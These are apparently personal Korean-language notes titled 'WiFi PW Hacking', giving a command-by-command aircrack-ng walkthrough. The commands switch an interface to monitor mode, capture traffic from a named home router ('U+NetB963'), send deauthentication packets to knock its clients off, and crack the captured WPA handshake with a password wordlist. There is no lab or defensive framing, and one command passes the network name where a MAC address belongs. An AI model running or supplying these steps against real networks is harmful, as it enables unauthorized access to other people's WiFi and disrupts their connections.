1. 설치 - aircrack-ng

    sudo apt install aircrack-ng net-tools -y
    
    
  2. 모니터 모드로 전환

    sudo ifconfig wlx909f33ee3999 down
    sudo **iwconfig** wlx909f33ee3999 mode monitor
    sudo ifconfig wlx909f33ee3999 up
    
    

WiFi PW Hacking

  1. 모니터 모드로 전환

    sudo ifconfig wlx909f33ee3999 down
    sudo **iwconfig** wlx909f33ee3999 mode monitor
    sudo ifconfig wlx909f33ee3999 up
    
  2. 타깃 ssid의 채널을 알아내기 위한 전체 네트워크 스캔

    sudo airodump-ng wlx909f33ee3999
    
  3. 타깃 ssid에 대해서만 네트워크 스캔, hack01.cap 파일로 저장

    sudo airodump-ng -w hack01 -c 8 --bssid U+NetB963 wlx909f33ee3999
    
  4. 타킷 AP에 대해 연결 해제 패킷 송신

    sudo aireplay-ng --deauth 100 -e U+NetB963 wlx909f33ee3999
    
  5. BIG-WPA-LIST-2 dictionary 파일로 패스워드 크랙(dictionary) (bruteforce 옵션 없음)

    sudo aircrack-ng hack01.cap -w ./바탕화면/BIG-WPA-LIST-2